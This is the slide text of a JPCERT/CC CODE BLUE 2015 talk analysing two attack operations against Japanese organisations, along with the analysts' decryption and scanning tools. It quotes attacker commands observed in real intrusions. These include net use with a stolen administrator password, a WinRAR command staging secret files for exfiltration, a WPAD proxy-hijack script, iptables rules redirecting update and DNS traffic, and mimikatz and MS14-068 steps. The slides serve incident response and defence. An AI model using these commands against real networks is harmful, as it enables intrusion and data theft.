Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nakamura - CODE BLUE 2015

Revealing the Attack Operations Targeting JapanJPCERT/CCShusei TomonagaYuu NakamuraCODE BLUE 2015

Copyright2015 JPCERT/CC All rights reserved.

0

Agenda1 Introduction Operation A Operation B


1



2

Self-introduction

Analysis Center at JPCERT Coordination Center Malware analysis, Forensics investigation

3Shusei Tomonaga

Yuu Nakamura


3

JPCERT Coordination CenterJapan Computer Emergency Response Team Coordination CenterEarly warning informationCSIRT establishment supportIndustrial control system securityInternational collaborationArtifact (e.g. Malware) analysis


4

Targeted Attacks handled by JPCERT/CC

5From April to September 2015934

130organizations

93 organizations4 organizationsOperation AOperation B

Copyright2015 JPCERT/CC All rights reserved.Introducing 2 Types of Attack Operations6


6



7

Attackers InfrastructureCompromised Web sitesVictim organizations (Public offices, private companies)

OverseasJapan

Targeted emailsWidespread emails

8Watering hole

Characteristics of Operation A

Copyright2015 JPCERT/CC All rights reserved.Flash Player (CVE-2015-5119CVE-2015-5122)MS14-068(Kerberos (3011780))- CVE-2014-63248

Details of Internal Intrusion Techniques9


9



10

Attack Patterns11Timeline of Attack VectorDisguised IconDocument File(Exploit vulnerabilities)Drive-ByDownload2014/052015/012015/052015/07CVE-2014-7247CVE-2015-5119CVE-2015-5122Medical expense, Health insurance

In many attacks, malware are disguised with fake icons, compressed withzip or lzh and attached to emails.Attacks aiming certain targets may lead to correspondence of emails.2014/092014/112015/09


11


Copyright2015 JPCERT/CC All rights reserved.Investigation of Compromised Environment13Uses Legitimate tools provided by MS


13

Example of Using dsquery14

Used in some cases targeting specific individuals


14

Collecting Email Account InformationUses free tools (Similar to NirSoft Mail PassView)Attempts to receive emails from outsideMay lead to new attack emails (correspondence of emails) Infection spreading from organization to organization

15


15

Collecting Classified / Personal Information16


16

Search Network Drive (1)> net useNew connections will be remembered.

Status Local Remote Network-------------------------------------------------------------------------------OK T:\\FILESV01\SECRET Microsoft Windows NetworkOK U:\\FILESV02\SECRET Microsoft Windows Network> wmic logicaldisk get caption,providername,drivetype,volumenameCaption DriveType ProviderName VolumeNameC: 3OSD: 3 VolumeT: 4 \\FILESV01\SECRET VolumeU: 4 \\FILESV01\SECRET Volumenet use commandwmic command

17DriveType = 4 Network Drive

Copyright2015 JPCERT/CC All rights reserved.Search Network Drive (2)> netstat an

TCP 192.168.xx.xx:49217 192.168.yy.yy:445 ESTABLISHED

> nbtstat -a 192.168.yy.yyName Type Status---------------------------------------------FILESV01 UNIQUE RegisteredCombination of netstat Command & nbtstat CommandPort 445 is set as the key to search the access point of file sharing service

18


18

Search Targeted Data> dir c:\users\hoge\*.doc* /s /o-d

c:\users\hoge\AppData\Local\Temp Directory

2014/07/29 10:19 28,672 20140820.doc1 File 28,672 bytes

c:\users\hoge\Important Information Directory

2015/08/29 10:03 1,214 Design Document.doc> dir \\FILESV01\SECRET

\\FILESV\SECRET Directory

2014/07/11 09:16 [DIR] Management of Partner Companies2014/09/04 11:49 [DIR] Management of Intellectual Property2014/08/01 09:27 [DIR] Location information19dir commandNot only searches network drive but also compromised computers/s : Displayed recursively/o-d : Sorted by date


19

Compress, Download, Delete Evidence > winrar.exe a r ed v300m ta20140101 %TEMP%\a.rar \\FILESV01\SECRET\Management of Intellectual Property -n*.ppt* -n*.doc* -n*.xls* -n*.jtd

Adding \\FILESV01\SECRET\Management of Intellectual Property\Committee List(2015.05.01).docx OKAdding \\FILESV01\SECRET\Management of Intellectual Property\Framework.ppt OKAdding \\FILESV01\SECRET\Management of Intellectual Property\Application List.xlsx OKAdding \\FILESV01\SECRET\Management of Intellectual Property\Design Document.jtd OK20Compressed with RARRAR files are sent to C&C servers and deleted

Documents are compressed per folderz

Copyright2015 JPCERT/CC All rights reserved.Details of Internal Intrusion Techniques21

Copyright2015 JPCERT/CC All rights reserved.Methods Used to Spread Infection22


22

Exploiting Vulnerabilities (MS14-068 + MS14-058) 23

DomainControllerPC-A

PC-B

1. Escalate privilege (MS14-058) and dump users password with mimikatz

2. Exploit MS14-068 vulnerability and gain Domain Admin privileges3. Upload mimikatz to DC and dump admins passwords4. Copy malware to PC-B5. Register a task in order to execute malware6. Malware executes according to the task


23

Investigating SYSVOL Scripts24

Attackers Infrastructure

C2 Server3. Search admins passwordPC-A

PC-B

6. Malware executes according to the task

2. Download1. Download logon script, compress and archive

DomainController5. Register a task in order to execute malware 4. Copy malware to PC-B


24

Password List-based Attack25

PC-A

PC-B

4. Register a task 3. Copy malware

1. Get users list of Domain Admins5. ExecuteDomainController2. Attempts logon with logon.exe


25

Exploiting Built-in Administrator Password26

PC-A

PC-B

3. Copy malware

1. Escalate privilege (UAC bypass) and dump users password5. Execute4. Register a task

net use \\PC-B\IPC$ [password] /u:Administrator2. Pass the hash or net use


26

Setting Malware in File Servers27

PC-A

PC-B

1. Replace the existing file with malware disguised with fake icons2. Execute malware in file serversFile Server


27

Exploiting WPAD

Turned on by default Get automatic configuration script from eitherURL specified by DHCP server, orhttp://wpad/wpad.dat

28

WPAD (Web Proxy Auto-Discovery)


28

Exploiting WPAD (Step 1: NetBIOS Spoofing)29

PC-A

PC-B

2. Name query response (I am WPAD)1. Broadcast: Name query NB WPADwpad.exe

Copyright2015 JPCERT/CC All rights reserved.Exploiting WPAD (Step 2: Fake WPAD Server)30

PC-A

PC-B

4. Responsewpad.exe

function FindProxyForURL(url, host) {

if (myIpAddress() != [PC-A addr]) {return PROXY wpad:8888;DIRECT;}return DIRECT;}wpad.dat (automatic configuration script)3. Request http://wpad/wpad.dat

Copyright2015 JPCERT/CC All rights reserved.Exploiting WPAD (Step 3: Man in the Middle Proxy)31

PC-A

PC-B

5. Embed iframe in attackers Web sitewpad.exe

6. Drive-by download attack

Attackers InfrastructureAttackers Web Site

Web site


31

Summary: Methods of Spreading InfectionMethodADPrivilege EscalationNoteMS14-068NecessaryUnnecessary /Necessary for password dumpRisk exists when DC is unpatchedSYSVOL SearchNecessaryUnnecessaryBrute Force Attack (Password List Attack)NecessaryUnnecessaryRisk exists when the password is weakAbusing Built-in AdministratorUnnecessaryNecessaryPresumes that the password is the sameExploiting File ServersUnnecessaryUnnecessaryRisk exists when the file is disguised to one that many users openExploiting WPADUnnecessaryUnnecessarySituations are limited

32


32

Details of tools and malware

33

Copyright2015 JPCERT/CC All rights reserved.Characteristics of Malware34MalwareOverviewFile formatForm of attackEmdivi (t17)HTTP BOTEXEIntrudeToolsPassword dump, etc.EXE, etc.usp10jpgDownload (low-frequency communication)DLL, dataLateral MovementEmdivi (t19, t20)HTTP BOT (highly sophisticated than t17)EXEBeginXRemote shell toolEXEGStatusHTTP BOT (low-frequency communication)EXE,DLLConceal?

Reference : [Ayaka Funakoshi. A study on malware characteristics and its effects observed in targeted attacks. MWS, 2015]Different types of malware reside depending on the phase and scale of damage of the attack


34

Tools35TypeOverviewFilenamePassword dumpPass-the-hashQuarks PwDumpqp.exe, qd.exe, QDump.exe, etc.MimikatzLitegp.exeWindows credentials Editorwce.exe, ww.exeMimikatzmz.exe, mimikatz.exe, mimikatz.rar(sekurlsa.dll)Vulnerability exploitationMS14-068 (CVE-2014-6324)ms14-068.exems14-068.tar.gzMS14-058 (Privilege escalation)(CVE-2014-4113)4113.exeUAC bypassUAC bypass toolmsdart.exe, puac.exe, etc.Packet transmitHtran, proxy adaptive Htranhtproxy.exe, etc.Mail account theftSimilar to NirSoft Mail PassViewCallMail.exe, outl.exe , etc.UtilityAttempt logon based on listlogon.exeWinRAR archiveryrar.exe, rar,exe, etc.Highly sophisticated dir commanddirasd.exe, etc.Change timestamptimestomp.exe

Copyright2015 JPCERT/CC All rights reserved.Emdivi (t17)

Repeatedly upgraded the version in the past year and implemented new commands

36CommandDate of ImplementationDOABORTDOWNBGGETFILELOADDLLSETCMDSUSPENDUPLOADVERSIONGOTOMay 2015CLEARLOGSAugust 2015

HTTP BOT with basic functions


36

Emdivi (t20)

The number of implemented commands have increased and decreased in the past year. 18-41 (based on JPCERT/CCs study)

In some cases, the targeted organizations proxy server address is hard-coded.

May only run on specific computers (encryption of data by computer SID)

37Highly Sophisticated Emdivi


37

usp10jpg

Communication performed once a dayAble to specify the day of week of communicationTend to be set to computers that are not infected with Emdivi (secondary infection)DLL Preloading Attack

38Download (low-frequency communication)

dwmapi.dll, etc.

***.DAT

Application

Exploit specific DLL Search Order and load malicious DLL

Read data and execute


38

Difficulty to detect Usp10jpg39


Computer Infected with Emdivi

May be left undetected due to low-frequency communication

usp10jpgEasy to detect due to high-frequency communication

Copyright2015 JPCERT/CC All rights reserved.BeginX

BeginX Server Listens to specific ports and waits for commands Both UDP and TCP versions available

BeginX Client Client which sends commands to BeginX Server Controlled via Emdivi40

Remote Shell Tool


40

Image of Using BeginX41


Segment (unable to connect to Internet)

Computer Infected with Emdivi

BeginXServer

BeginXClient

Unable to control by Emdivi infection

Able to control via BeginX

Emdivi


41

42

Not found in many organizations, but...

Bot Function Get drive information Execute arbitrary shell command Process list Screen related functions

HTTP BOT different from EmdiviGStatus

Copyright2015 JPCERT/CC All rights reserved.GStatus Web Panel (Admin Screen)43

Copyright2015 JPCERT/CC All rights reserved.Analysis ToolS

44emdivi_string_decryptor.py

Copyright2015 JPCERT/CC All rights reserved.emdivi_string_decryptor.py45


45

emdivi_string_decryptor.py

46Emdivi encoded strings

Copyright2015 JPCERT/CC All rights reserved.emdivi_string_decryptor.py47Difference depending on version stringVer 17Ver 19 or 20Ver 20EncryptXxTEA encryptXxTEA decryptAES decryptDecryptXxTEA decryptXxTEA encryptAES encryptKeyMD5( MD5(base64(ver)) + MD5(key_string))Scanf( "%x", Inc_Add( ver17_key ))Inc_Add( ver17_key)


47

emdivi_string_decryptor.py

48

Copyright2015 JPCERT/CC All rights reserved.emdivi_string_decryptor.py

49

Copyright2015 JPCERT/CC All rights reserved.Demo

50

Copyright2015 JPCERT/CC All rights reserved.Agenda51 Introduction Operation A Operation B


51

Attack Techniques52

Copyright2015 JPCERT/CC All rights reserved.Attack Techniques53


Drive-by Download (Watering Hole) Attack54

Targeted Organization

Japanese Web server

1. Access to Web site

. Redirect0. Deface Web site

. Download malware. Malware Infection

Attackers Server


54

Access Control55.htaccessTarget nameIP address

Copyright2015 JPCERT/CC All rights reserved.560-day Exploits

Copyright2015 JPCERT/CC All rights reserved.Attack Techniques57


Update Hijacking58


Update Server

1. Request to update

0. Alter updated information

. Download malware. Malware Infection

Fake Update Server

. Fake update Information

. Request to download

Method used to alter updated information


58

Another Update Hijacking Pattern


Update ServerFake Update Server

Method used without changing update server's file59

0. Change iptables

1. Software Update


59

Another Update Hijacking PatternMethod used without changing update server's fileiptables -t nat -A PREROUTING -i eth0 -s aa.bb.cc.dd -p tcp --dport 80 -j DNAT --to-destination ww.xx.yy.zz:5360TCP 80 is forwarded by iptables.


60

Attack Techniques61


Domain Name Hijacking

62

Targeted OrganizationRegistrarRegistry.comDNS Server

Attackers InfrastructureDNSServerWebServerDNSServerWebServerLegitimate Server0. Change registration information

1.DNS query2.DNS query

4.Web access


62

Details of malware

63

Copyright2015 JPCERT/CC All rights reserved.Domain Name Hijackingiptables -t nat -A PREROUTING -p udp --dport 53 -m string --from 30 --to 34 --hex-string "|03|AAA" --algo bm -j DNAT --to-destination aa.bb.cc.dd:54

iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to ww.xx.yy.zz:5364Routing of only specific DNS queries by using iptablesAAA.example.com


64

Characteristics of Malware65

Uses a different malware before and after the intrusion

Some malware run in memory only

Embedding target organization's internal information

Uses code signing certificate in some cases


65

Characteristics of Malware66Intrusion

Concealing


66

Malware (Intrusion)67commandinfo0x184004Execute remote shell0x184008Run remote shell command0x18400cCreate file0x184010Load file0x184014Get drive information0x184018Create directory0x18401cSearch file0x184020Delete file

commandinfo0x184024Move file0x184028Process list0x18402cTerminate process0x184030Sleep0x184034Install command0x184038Set Sleep Time0x18403cTerminate

HTTP bot with basic functionsCommand List


67

IP Address Acquisition Algorithm68Get C2 IP address from Web pageDecode

start: @MICR0S0FTend: C0RP0RATI0Nstart: lOve yOu 4 eveRend: Reve 4 uOy evOl

Copyright2015 JPCERT/CC All rights reserved.Malware (Intrusion)69Plug-in-based malwarecommand numberinfo0Send data to server1Set TickCount3Plug-in registration4Allocate Plug-in settings area5Set Plug-in settings area6Create/Execute plug-in7Terminate plug-in8Create configuration file9-

Command list


69

Malware Running in Memory Only70CVE-2013-3918 with McRAT

ROP

skipShellcodeMalware


70

Malware Running in Memory Only71CVE-2013-3918 with McRAT

Executes rundll32.exe and injects code

McRAT's data below Shellcode is injected

Not saved as a file


71

Malware (Intrusion)72Simple HTTP bot with limited functionscommandinfo downonlyDownload file downexecDownload and Execute file -Run remote shell command

Command list


72

Preshin Controller73

PHP-based Controller

Copyright2015 JPCERT/CC All rights reserved.Preshin Controller74Example of command execution


74

Malware (Intrusion)75HTTP bot with basic functionscommandinfo1Get disk information2File list3Open file4Upload file5Create file7Load file

commandinfo8-9Delete file10Delete file/folder11Upload file12Create folder13Move file

Command list


75

Malware (Concealing)76Malware with Rootkit functionscommandinfo fileFile related operation informationSend configuration information proxyEnable Proxy settings connectConnect to Hikit proxy shellRun remote shell command socks5Enable Proxy settings (socks5) exitTerminate

Command list


76

Hikit Configuration Information77Hikit has proxy information of the internal network

Proxy info

IDTarget name

Rootkit setting


77

Malware (Concealing)78Malware recently often usedcommandinfo cmd4Service/Process related operation cmd5Run remote shell command cmd6Connect to Derusbi proxy cmd7File operation cmd8Terminate cmd9Create/Delete file

Command list


78

Derusbi Configuration Information79Derusbi has proxy information of the internal network

Proxy info

ID


79

Code Signing Certificate80IdentityTypeCountry System IntegratorexeJapan Software VendorexeJapan Software VendorexeKorea AutomakerexeKorea Heavy IndustryjarKorea Software VendorexeKorea Electronics IndustryjarKorea Software VendorexeKorea


Infrastructure Used by Attackers

81


Attackers ServerWeb Server

Overseas ServerBackdoorJapan

C2 Server

iptables


81

Linux Backdoor82mod_rootme source

KeywordRoronoa


82

Linux Backdoor83FunctionMyNetstatCreateShellMymkdirPortTunnelGetGetFileSourceMymkfilePortTunnel_RemoteCloseMyPsMyrmfilePortTunnel_ShowKillByPidMyrmdirCreatePortTunnelNewConnectToListDirPortForwardStartPutFilemy_rebootPortForward_ShowPutFileDestShowHidePortForward_CloseShellServerSwitchHide

Copyright2015 JPCERT/CC All rights reserved.Analysis ToolS

84apt17scan.py

Copyright2015 JPCERT/CC All rights reserved.apt17scan.py85


85

apt17scan.py86Scan with YARASearch configuration data addressParse configuration dataDump configuration

Copyright2015 JPCERT/CC All rights reserved.apt17scan.py87apt17scan Detecting Malware

Copyright2015 JPCERT/CC All rights reserved.apt17scan.py88derusbiconfig Dump configuration information for Derusbi

Copyright2015 JPCERT/CC All rights reserved.apt17scan.py89hikitconfig Dump configuration information for Hikit

Copyright2015 JPCERT/CC All rights reserved.apt17scan.py90agtidconfig Dump configuration information for Agtid

Copyright2015 JPCERT/CC All rights reserved.Demo

91

Copyright2015 JPCERT/CC All rights reserved.How to Download92https://github.com/JPCERTCC

Copyright2015 JPCERT/CC All rights reserved.Thank [email protected]://www.jpcert.or.jp

Incident [email protected]://www.jpcert.or.jp/form/


93